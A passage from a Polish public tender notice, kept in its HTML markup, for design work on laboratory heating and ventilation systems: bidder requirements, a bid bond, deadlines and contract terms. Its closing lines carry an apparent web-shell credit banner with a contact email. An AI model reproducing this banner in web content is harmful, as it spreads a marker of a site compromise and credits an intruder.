i urządzeń<br/>cieplnych, wentylacyjnych, wodociągowych i kanalizacyjnych,<br/>Doświadczenie zawodowe<br/>Wymagane wykonanie, w okresie ostatnich ośmiu lat przed upływem terminu składania ofert, co najmniej dwóch projektów<br/>wykonawczych w zakresie instalacji i urządzeń cieplnych, wentylacyjnych i klimatyzacyjnych ze stabilizacją parametrów<br/>cieplnych i wilgotnościowych w laboratoriach, o powierzchni użytkowej nie mniejszej niż 200,00 m2 każde <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">1. Do oferty Wykonawca<br/>zobowiązany jest dołączyć oświadczenie stanowiące potwierdzenie, że Wykonawca:<br/>1) nie podlega wykluczeniu;<br/>2) spełnia warunki udziału w postępowaniu.<br/>2. Oświadczenie Wykonawcy, o którym mowa w pkt. IX. 1., składane jest w formie elektronicznej to jest opatrzonej kwalifikowanym<br/>podpisem elektronicznym, lub w postaci elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym, zgodnie ze wzorem<br/>stanowiącym załącznik 1. oraz załącznik 2.<br/>3) W celu potwierdzenia braku podstaw do wykluczenia Wykonawcy oraz podmiotu udostępniającego zasoby z udziału w<br/>postępowaniu :<br/>a) odpis lub informację z Krajowego Rejestru Sądowego lub Centralnej Ewidencji i Informacji o Działalności Gospodarczej, w<br/>zakresie art. 109 ust. 1 pkt. 4 ustawy Pzp, sporządzonych nie wcześniej niż 3 miesiące przed jej złożeniem,<br/>Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza granicami Rzeczypospolitej Polskiej, zamiast dokumentu o którym<br/>mowa powyżej, składa dokument lub dokumenty wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania,<br/>potwierdzające, że nie otwarto jego likwidacji ani nie ogłoszono upadłości, jego aktywami nie zarządza likwidator lub sąd, nie zawarł<br/>układu z wierzycielami, jego działalność gospodarcza nie jest zawieszona ani nie znajduje się on w innej tego rodzaju sytuacji<br/>wynikającej z podobnej procedury przewidzianej w przepisach miejsca wszczęcia tej procedury, wystawiony nie wcześniej niż 3<br/>miesiące przed ich złożeniem.<br/>Jeżeli w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów o których mowa powyżej,<br/>zastępuje się je odpowiednio w całości lub w części dokumentem zawierającym odpowiednio oświadczenie wykonawcy, ze<br/>wskazaniem osoby lub osób uprawnionych do jego reprezentacji, lub oświadczenie osoby, której dokument miał dotyczyć, złożone<br/>pod przysięgą, lub, jeżeli w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania nie ma przepisów o oświadczeniu pod<br/>przysięgą, złożone przed organem sądowym lub administracyjnym, notariuszem, organem samorządu zawodowego lub<br/>gospodarczego właściwym ze względu na siedzibę lub miejsce zamieszkania wykonawcy z zastrzeżeniem terminów, o których<br/>mowa powyżej.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">1) w<br/>celu potwierdzenia spełniania przez Wykonawcę warunków udziału w postępowaniu:<br/>a) oświadczenie wykonawcy o rocznym przychodzie wykonawcy lub o przychodzie wykonawcy w obszarze objętym zamówieniem,<br/>za okres nie dłuższy niż ostatnie 3 lata obrotowe, a jeżeli okres prowadzenia działalności jest krótszy - za ten okres (załącznik nr 10<br/>do SWZ);<br/>b) informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającej wysokość posiadanych środków<br/>finansowych lub zdolność kredytową wykonawcy, w okresie nie wcześniejszym niż 3 miesiące przed jej złożeniem;<br/>c) dokumenty potwierdzające, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności<br/>związanej z przedmiotem zamówienia ze wskazaniem sumy gwarancyjnej tego ubezpieczenia;<br/>d) wykaz robót budowlanych wykonanych nie wcześniej niż w okresie ostatnich ośmiu lat*, a jeżeli okres prowadzenia działalności<br/>jest krótszy - w tym okresie, wraz z podaniem ich rodzaju, wartości, daty i miejsca wykonania oraz podmiotów, na rzecz których<br/>roboty te zostały wykonane oraz załączeniem dowodów określających, czy te roboty budowlane zostały wykonane należycie, przy<br/>czym dowodami, o których mowa są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego roboty<br/>budowlane były wykonane, a jeżeli wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów – inne<br/>dokumenty.<br/>Jeżeli wykonawca powołuje się na doświadczenie w realizacji robót budowlanych wspólnie z innymi wykonawcami powyższy wykaz<br/>musi dotyczyć robót budowlanych, w których wykonaniu ten wykonawca bezpośrednio uczestniczył – załącznik nr 7 WYKAZ ROBÓT BUDOWLANYCH<br/>e) wykaz osób, skierowanych przez Wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za<br/>świadczenie usług i kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień,<br/>doświadczenia i wykształcenia niezbędnego do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie<br/>czynności oraz informację o podstawie do dysponowania tymi osobami – załącznik nr 8 WYKAZ OSÓB<br/>f) Oświadczenie Wykonawcy, w zakresie art. 108 ust. 1 pkt. 5 ustawy, o braku przynależności do tej samej grupy kapitałowej, w<br/>rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów (Dz. U. z 2020 r. poz. 1076), z innym wykonawcą,<br/>który złożył odrębną ofertę, ofertę częściową lub wniosek o dopuszczenie do udziału w postępowaniu, albo oświadczenia o<br/>przynależności do tej samej grupy kapitałowej wraz z dokumentami lub informacjami potwierdzającymi przygotowanie oferty, oferty<br/>częściowej lub wniosku o dopuszczenie do udziału w postępowaniu niezależnie od innego wykonawcy należącego do tej samej<br/>grupy kapitałowej – załącznik nr 9 do SWZ, oświadczenie będzie wymagane na wezwanie Zamawiającego.<br/>* Okresy wyrażone w latach liczy się wstecz od dnia w którym upływa termin składania ofert</span> </h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 1. Wykonawca przystępujący do postępowania jest zobowiązany, przed upływem terminu składania ofert, wnieść wadium w<br/>kwocie: 50.000,00 zł.<br/>2. Od Wykonawcy, którego oferta zostanie wybrana jako najkorzystniejsza, wymagane będzie wniesienie, przed zawarciem<br/>umowy, zabezpieczenia należytego wykonania umowy w wysokości 5 % ceny całkowitej (brutto) podanej w ofercie za<br/>wykonanie całości przedmiotu zamówienia. Zabezpieczenie służy pokryciu roszczeń z tytułu niewykonania lub nienależytego<br/>wykonania umowy<br/>3. Tabela elementów scalonych – znajdująca się w Załączniku nr 11 SWZ<br/>Niniejszy dokument Wykonawca składa wraz z ofertą<br/>Zamawiający odrzuci ofertę jeżeli nie będzie zawierać tabeli elementów scalonych (załącznik nr 11 do SWZ)<br/>4. Ze względu na specyfikę przedmiotu zamówienia Zamawiający dopuszcza fakultatywnie przeprowadzenie przez Wykonawcę wizji lokalnej. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 1. Wykonawca przystępujący do postępowania jest zobowiązany, przed upływem terminu składania ofert, wnieść wadium w<br/>kwocie: 50.000,00 zł.<br/>2. Wadium musi obejmować pełen okres związania ofertą.<br/>3. Wadium może być wniesione w jednej lub kilku formach wskazanych w art. 97 ust. 7 PZP.<br/>Wadium wnoszone w pieniądzu należy wpłacić przelewem na rachunek bankowy w banku Santander Bank Polska SA 6<br/>Oddział w Poznaniu numer konta: 39 1090 1362 0000 0001 4382 6909. Wadium musi wpłynąć na wskazany rachunek<br/>bankowy zamawiającego najpóźniej przed upływem terminu składania ofert (decyduje godzina wpływu na rachunek<br/>bankowy zamawiającego).<br/>4. Wadium wnoszone w poręczeniach lub gwarancjach należy załączyć do oferty w oryginale w postaci dokumentu<br/>elektronicznego podpisanego kwalifikowanym podpisem elektronicznym przez wystawcę dokumentu i powinno zawierać<br/>następujące elementy:<br/>• nazwę dającego zlecenie (wykonawcy), beneficjenta gwarancji (zamawiającego), gwaranta/poręczyciela oraz wskazanie<br/>ich siedzib.<br/>• określenie wierzytelności, która ma być zabezpieczona gwarancją/poręczeniem,<br/>• kwotę gwarancji/poręczenia,<br/>• termin ważności gwarancji/poręczenia,<br/>• zobowiązanie gwaranta do zapłacenia kwoty gwarancji/poręczenia bezwarunkowo, na pierwsze pisemne żądanie<br/>zamawiającego, w sytuacjach określonych w art. 98 ust. 6 PZP.<br/>5. W przypadku, gdy wykonawca nie wniósł wadium lub wniósł w sposób nieprawidłowy lub nie utrzymywał wadium<br/>nieprzerwanie do upływu terminu związania ofertą lub złożył wniosek o zwrot wadium, w przypadku o którym mowa w art. 98<br/>ust. 2 pkt 3 PZP, zamawiający odrzuci ofertę na podstawie art. 226 ust. 1 pkt 14 PZP.<br/>6. Zamawiający dokona zwrotu wadium na zasadach określonych w art. 98 ust. 1–5 PZP.<br/>7. Zamawiający zatrzymuje wadium wraz z odsetkami na podstawie art. 98 ust. 6 PZP. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego.<br/>2.	W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, żaden z nich nie może podlegać wykluczeniu natomiast spełnianie warunków udziału w postępowaniu Wykonawcy wykazują w zakresie w jakim każdy z nich spełnia warunki udziału w postępowaniu, z zastrzeżeniem pkt. 7.5.<br/>3.	W przypadku wspólnego ubiegania się o zamówienie przez wykonawców oświadczenie, o którym mowa w pkt. IX.1 ppkt. 1) składa każdy z wykonawców wspólnie ubiegających się o zamówienie, natomiast oświadczenie z pkt. IX.1 ppkt. 2) składane jest w zakresie w jakim każdy z nich spełnia warunki udziału w postępowaniu. Dokumenty te potwierdzają spełnianie warunków udziału w postępowaniu oraz brak podstaw wykluczenia w zakresie, w którym każdy z Wykonawców wykazuje spełnienie warunków udziału w postępowaniu oraz brak podstaw do wykluczenia. <br/>4.	W odniesieniu do warunków dot. wykształcenia, kwalifikacji zawodowych lub doświadczenia, wykonawcy wspólnie ubiegający się o udzielenie zamówienia mogą polegać na zdolnościach tych wykonawców, którzy wykonają roboty budowlane lub usługi do realizacji których te zdolności są wymagane. W przypadku, o którym mowa powyżej wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty oświadczenie, z którego wynika, które roboty budowlane/dostawy/usługi wykonają poszczególni wykonawcy <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1. Wybrany Wykonawca jest zobowiązany do zawarcia umowy w sprawie zamówienia publicznego na warunkach<br/>określonych we Wzorze Umowy, stanowiącym Załącznik nr 4 do SWZ.<br/>2. Zakres świadczenia Wykonawcy wynikający z umowy jest tożsamy z jego zobowiązaniem zawartym w ofercie.<br/>3. Zamawiający przewiduje możliwość zmiany zawartej umowy w stosunku do treści wybranej oferty w zakresie<br/>uregulowanym w art. 454-455 p.z.p. oraz wskazanym we Wzorze Umowy, stanowiącym Załącznik nr 4 do SWZ.<br/>4. Zmiana umowy wymaga dla swej ważności, pod rygorem nieważności, zachowania formy pisemnej. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2023-08-17 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Ofertę należy złożyć za pośrednictwem platformy e-Zamowienia</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2023-08-17 11:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3> <h3 class="mb-0">8.5.) Zamawiający przewiduje wybór najkorzystniejszej oferty z możliwością negocjacji: <span class="normal">Tak</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com